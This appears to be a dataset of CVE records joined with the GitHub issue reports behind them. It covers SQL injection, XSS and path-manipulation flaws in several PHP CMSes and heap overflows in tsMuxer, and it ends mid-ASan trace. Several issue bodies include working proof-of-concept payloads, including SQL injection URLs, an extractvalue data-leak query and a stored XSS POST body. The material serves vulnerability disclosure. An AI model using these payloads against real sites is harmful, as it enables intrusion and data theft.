"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taogogo:taocms:2.5:beta5:*:*:*:*:*:*",
"matchCriteriaId": "F6BB739F-F7D1-4F9A-A6F4-6D7AB4B05E0B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/taogogo/taocms/issues/4 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"taogogo",
"taocms"
] | First, we enter the background and use the column administrator admin1 we created:

We click in order and grab packets:


There is a blind SQL injection vulnerability in the location of id:



poc:/admin/admin.php?action=cms&id=30+and+1=3&ctrl=edit | There is SQL blind injection at "Edit article"(Column administrator authority) | https://api.github.com/repos/taogogo/taocms/issues/4/comments | 1 | 2021-01-05T06:45:53Z | 2021-03-03T17:02:19Z | https://github.com/taogogo/taocms/issues/4 | 778,636,941 | 4 | 2,828 |
CVE-2021-25785 | 2021-12-02T23:15:07.643 | Taocms v2.5Beta5 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Management column. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taogogo:taocms:2.5:beta5:*:*:*:*:*:*",
"matchCriteriaId": "F6BB739F-F7D1-4F9A-A6F4-6D7AB4B05E0B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/taogogo/taocms/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"taogogo",
"taocms"
] | First, we enter the background and use the column administrator admin1 we created:

Let's click "add article" on the left:
http://target/admin/admin.php?action=frame&ctrl=iframes

Wow!

POC:
/admin/admin.php
postData:name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat=0&content=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B&slug=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=&link=&thumbpic=&orders=&status=1&action=cms&ctrl=save&id=&Submit=%E6%8F%90%E4%BA%A4 | There is a storage type cross site scripting attack at "Management column"(Column administrator authority) | https://api.github.com/repos/taogogo/taocms/issues/3/comments | 1 | 2021-01-05T06:42:31Z | 2021-03-03T17:02:09Z | https://github.com/taogogo/taocms/issues/3 | 778,634,917 | 3 | 2,829 |
CVE-2021-43673 | 2021-12-03T12:15:07.587 | dzzoffice 2.02.1_SC_UTF8 is affected by a Cross Site Scripting (XSS) vulnerability in explorerfile.php. The output of the exit function is printed for the user via exit(json_encode($return)). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zyx0814/dzzoffice/issues/188"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zyx0814/dzzoffice/issues/188"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dzzoffice:dzzoffice:2.02.1:*:*:*:*:*:*:*",
"matchCriteriaId": "0ECA901D-850D-468C-B516-01F29417313D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/zyx0814/dzzoffice/issues/188 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"zyx0814",
"dzzoffice"
] | Hello,
I would to report for a possible XSS vulnerability.
In file "explorerfile.php"
```php
// line 22
// the source
$sid = empty($_GET['sid']) ? 0 : $_GET['sid'];//id
// line 149
$return = array(
'sid' => $sid,
'total' => $total,
'data' => $data ? $data : array(),
'folderdata' => $folderdata ? $folderdata : array(),
'param' => array(
'disp' => $folder['disp'],
'view' => $folder['iconview'],
'page' => $page,
'perpage' => $perpage,
'bz' => $bz,
'total' => $total,
'asc' => $asc,
'keyword' => $keyword,
'localsearch' => $bz ? 1 : 0
)
);
// line 167
// the sink, the output of exit function will be print it for the user.
exit(json_encode($return));
``` | Possible XSS vulnerability | https://api.github.com/repos/zyx0814/dzzoffice/issues/188/comments | 5 | 2021-05-14T19:23:58Z | 2021-12-08T23:46:03Z | https://github.com/zyx0814/dzzoffice/issues/188 | 892,179,198 | 188 | 2,830 |
CVE-2021-43674 | 2021-12-03T13:15:07.603 | ThinkUp 2.0-beta.10 is affected by a path manipulation vulnerability in Smarty.class.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ThinkUpLLC/ThinkUp/issues/2289"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ThinkUpLLC/ThinkUp/issues/2289"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thinkupapp:thinkup:2.0:beta10:*:*:*:*:*:*",
"matchCriteriaId": "88947B8D-7E10-4B6F-BF4E-FC55C1F1751D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/ThinkUpLLC/ThinkUp/issues/2289 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ThinkUpLLC",
"ThinkUp"
] | Hello,
I would like to report for path manipulation vulnerability.
The path of the vulnrability:
File "Smarty.class.php" line 1714
```php
function _read_file($filename)
{
if ( file_exists($filename) && is_readable($filename) && ($fd = @fopen($filename, 'rb')) ) {
$contents = '';
while (!feof($fd)) {
$contents .= fread($fd, 8192);
}
fclose($fd);
// the source
return $contents;
} else {
return false;
}
}
```
File "core.read-cache-file.php"
```php
line 43
// the source will be the returned value from _read_file
$params['results'] = $smarty->_read_file($_cache_file);
// line 51
$_contents = $params['results'];
// line 54
$_cache_info = unserialize(substr($_contents, $_info_start, $_info_len));
//line 73
// the pattern is array_keys here
foreach (array_keys($_cache_info['template']) as $_template_dep) {
$_params['resource_name'] = $_template_dep;
// the source will pass to _fetch_resource_info function
if (!$smarty->_fetch_resource_info($_params) || $_cache_info['timestamp'] < $_params['resource_timestamp']) {
// template file has changed, regenerate cache
return false;
}
}
```
File "Smarty.class.php"
```php
// line 1538 in function _fetch_resource_info
$_params = array('resource_name' => $params['resource_name']) ;
// line 1544
if ($this->_parse_resource_name($_params)) {..}
// line 1620 in function _parse_resource_name
// $params is $_params
$_resource_name_parts = explode(':', $params['resource_name'], 2);
// line 1632
$params['resource_type'] = $_resource_name_parts[0];
// line 1661
$_params = array('type' => $params['resource_type']);
// line 1663
// the source will be passed in $_params['type'] to the function smarty_core_load_resource_plugin
smarty_core_load_resource_plugin($_params, $this);
```
File "core.load_resource_plugin.php"
```php
// line 44
// $params['type'] will be in $_plugin_file
$_plugin_file = $smarty->_get_plugin_filepath('resource', $params['type']);
// line 51
include_once($_plugin_file);
``` | Possible Path manipulation vulnerability | https://api.github.com/repos/ThinkUpLLC/ThinkUp/issues/2289/comments | 2 | 2021-11-10T12:15:33Z | 2021-12-07T15:12:50Z | https://github.com/ThinkUpLLC/ThinkUp/issues/2289 | 1,049,751,211 | 2,289 | 2,831 |
CVE-2021-44347 | 2021-12-03T19:15:07.873 | SQL Injection vulnerability exists in TuziCMS v2.0.6 in App\Manage\Controller\GuestbookController.class.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yeyinshi/tuzicms/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yeyinshi/tuzicms/issues/7"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yejiao:tuzicms:2.0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "8998CDEF-98D4-46B2-B8AC-72E10F37CF85",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/yeyinshi/tuzicms/issues/7 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yeyinshi",
"tuzicms"
] | \App\Manage\Controller\GuestbookController.class.php
line:
188-219
public function delall(){
//dump($_POST);
//exit;
$m=D('Guestbook'); //数据库表,配置文件中定义了表前缀,这里则不需要写
$id = I('post.id');
//dump($id);
//exit;
if ($id==null){
$this->error('请选择删除项!');
}
//判断id是数组还是一个数值
if(is_array($id)){
$where = 'id in('.implode(',',$id).')';
//implode() 函数返回一个由数组元素组合成的字符串
}else{
$where = 'id='.$id;
}
//dump($where);
//exit;
$count=$m->where($where)->delete(); //修改表单用save函数
if ($count>0){
$this->success("成功删除{$count}条!");
}
else {
$this->error('批量删除失败!');
}
}
}
This's SQLinjection
POC:
http://127.0.0.1/index.php/Guestbook/Index/delal
POST:id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e))) | \App\Manage\Controller\GuestbookController.class.php has SQLinjection | https://api.github.com/repos/yeyinshi/tuzicms/issues/7/comments | 0 | 2021-11-28T13:01:01Z | 2021-11-28T13:01:01Z | https://github.com/yeyinshi/tuzicms/issues/7 | 1,065,326,179 | 7 | 2,832 |
CVE-2021-35344 | 2021-12-03T20:15:07.627 | tsMuxer v2.6.16 was discovered to contain a heap-based buffer overflow via the function BitStreamReader::getCurVal in bitStream.h. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/justdan96/tsMuxer/issues/432"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/justdan96/tsMuxer/pull/439/commits/3a889a37b5b74a45025aca13ebda394b8f706ef3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/justdan96/tsMuxer/issues/432"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/justdan96/tsMuxer/pull/439/commits/3a889a37b5b74a45025aca13ebda394b8f706ef3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:2.6.16:*:*:*:*:*:*:*",
"matchCriteriaId": "D9880E94-9CCB-4A6A-97BA-B6DDEB30C0B9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/justdan96/tsMuxer/issues/432 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"justdan96",
"tsMuxer"
] | Hi, please see asan output and poc file below.
Found by **Cem Onat Karagun of Diesec**
As you can see on backtrace
```cpp
bitStream.h:58:61 is called after HevcHdrUnit::deserialize // hevc.cpp:995:39.
```
System info:
```
Ubuntu 21.04
tsMuxeR version git-f6ab2a2
```
To run PoC after unzip:
[getCurVal_3.zip](https://github.com/justdan96/tsMuxer/files/6557051/getCurVal_3.zip)
```
$ ./tsmuxer getCurVal_3
```
Asan output:
```
tsMuxeR version git-f6ab2a2. github.com/justdan96/tsMuxer
=================================================================
==7777==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000020fde at pc 0x00000042ca17 bp 0x7ffc8ba3e270 sp 0x7ffc8ba3e268
READ of size 1 at 0x612000020fde thread T0
#0 0x42ca16 in BitStreamReader::getCurVal(unsigned int*) /src/build/../tsMuxer/bitStream.h:58:61
#1 0x42ca16 in BitStreamReader::getBits(unsigned int) /src/build/../tsMuxer/bitStream.h:87:24
#2 0x50a120 in HevcHdrUnit::deserialize() /src/build/../tsMuxer/hevc.cpp:995:39
#3 0x52bb4a in HEVCStreamReader::checkStream(unsigned char*, int) /src/build/../tsMuxer/hevcStreamReader.cpp:88:24
#4 0x6d0b97 in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /src/build/../tsMuxer/metaDemuxer.cpp:770:21
#5 0x6c7255 in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /src/build/../tsMuxer/metaDemuxer.cpp:684:35
#6 0x5df87e in detectStreamReader(char const*, MPLSParser*, bool) /src/build/../tsMuxer/main.cpp:120:34
#7 0x5efd05 in main /src/build/../tsMuxer/main.cpp:698:17
#8 0x7fe506733564 in __libc_start_main csu/../csu/libc-start.c:332:16
#9 0x2ebded in _start (/home/Fuzzer_Instance_21/txmux/tsMuxer/bin/tsMuxeR+0x2ebded)
0x612000020fde is located 0 bytes to the right of 286-byte region [0x612000020ec0,0x612000020fde)
allocated by thread T0 here:
#0 0x39823d in operator new[](unsigned long) (/home/Fuzzer_Instance_21/txmux/tsMuxer/bin/tsMuxeR+0x39823d)
#1 0x514859 in HevcUnit::decodeBuffer(unsigned char const*, unsigned char const*) /src/build/../tsMuxer/hevc.cpp:40:19
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/build/../tsMuxer/bitStream.h:58:61 in BitStreamReader::getCurVal(unsigned int*)
Shadow bytes around the buggy address:
0x0c247fffc1a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c247fffc1b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c247fffc1c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
0x0c247fffc1d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fffc1e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c247fffc1f0: 00 00 00 00 00 00 00 00 00 00 00[06]fa fa fa fa
0x0c247fffc200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc210: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc220: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fffc240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==7777==ABORTING
``` | heap-buffer-overflow in bitStream.h:58:61 | https://api.github.com/repos/justdan96/tsMuxer/issues/432/comments | 0 | 2021-05-27T22:03:26Z | 2022-06-22T21:50:03Z | https://github.com/justdan96/tsMuxer/issues/432 | 904,255,130 | 432 | 2,833 |
CVE-2021-35346 | 2021-12-03T20:15:07.680 | tsMuxer v2.6.16 was discovered to contain a heap-based buffer overflow via the function HevcSpsUnit::short_term_ref_pic_set(int) in hevc.cpp. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/justdan96/tsMuxer/issues/436"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/justdan96/tsMuxer/pull/422/files"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/justdan96/tsMuxer/issues/436"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/justdan96/tsMuxer/pull/422/files"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:2.6.16:*:*:*:*:*:*:*",
"matchCriteriaId": "D9880E94-9CCB-4A6A-97BA-B6DDEB30C0B9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/justdan96/tsMuxer/issues/436 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"justdan96",
"tsMuxer"
] | Hi, please see asan output and poc file below.
Found by **Cem Onat Karagun of Diesec**
As you can see on backtrace
```cpp
hevc.cpp:502:37 is called after HevcSpsUnit::deserialize // hevc.cpp:872:17.
```
System info:
```
Ubuntu 21.04
tsMuxeR version git-f6ab2a2
```
To run PoC after unzip:
[short_term_1.zip](https://github.com/justdan96/tsMuxer/files/6557058/short_term_1.zip)
```
$ ./tsmuxer short_term_1
```
Asan output:
```
tsMuxeR version git-f6ab2a2. github.com/justdan96/tsMuxer
=================================================================
==7825==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61700000dc10 at pc 0x000000510c90 bp 0x7ffd6ec5b000 sp 0x7ffd6ec5aff8
WRITE of size 1 at 0x61700000dc10 thread T0
#0 0x510c8f in HevcSpsUnit::short_term_ref_pic_set(int) /src/build/../tsMuxer/hevc.cpp:502:37
#1 0x50ce4c in HevcSpsUnit::deserialize() /src/build/../tsMuxer/hevc.cpp:872:17
#2 0x52c0c0 in HEVCStreamReader::checkStream(unsigned char*, int) /src/build/../tsMuxer/hevcStreamReader.cpp:74:24
#3 0x6d0b97 in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /src/build/../tsMuxer/metaDemuxer.cpp:770:21
#4 0x6c7255 in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /src/build/../tsMuxer/metaDemuxer.cpp:684:35
#5 0x5df87e in detectStreamReader(char const*, MPLSParser*, bool) /src/build/../tsMuxer/main.cpp:120:34
#6 0x5efd05 in main /src/build/../tsMuxer/main.cpp:698:17
#7 0x7f70e9543564 in __libc_start_main csu/../csu/libc-start.c:332:16
#8 0x2ebded in _start (/home/Fuzzer_Instance_39/txmux/tsMuxer/bin/tsMuxeR+0x2ebded)
0x61700000dc10 is located 0 bytes to the right of 656-byte region [0x61700000d980,0x61700000dc10)
allocated by thread T0 here:
#0 0x39812d in operator new(unsigned long) (/home/Fuzzer_Instance_39/txmux/tsMuxer/bin/tsMuxeR+0x39812d)
#1 0x50cb34 in __gnu_cxx::new_allocator<ShortTermRPS>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/ext/new_allocator.h:115:27
#2 0x50cb34 in std::allocator_traits<std::allocator<ShortTermRPS> >::allocate(std::allocator<ShortTermRPS>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/alloc_traits.h:460:20
#3 0x50cb34 in std::_Vector_base<ShortTermRPS, std::allocator<ShortTermRPS> >::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_vector.h:346:20
#4 0x50cb34 in std::vector<ShortTermRPS, std::allocator<ShortTermRPS> >::_M_default_append(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/vector.tcc:635:34
#5 0x50cb34 in std::vector<ShortTermRPS, std::allocator<ShortTermRPS> >::resize(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_vector.h:940:4
#6 0x50cb34 in HevcSpsUnit::deserialize() /src/build/../tsMuxer/hevc.cpp:869:16
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/build/../tsMuxer/hevc.cpp:502:37 in HevcSpsUnit::short_term_ref_pic_set(int)
Shadow bytes around the buggy address:
0x0c2e7fff9b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff9b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff9b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
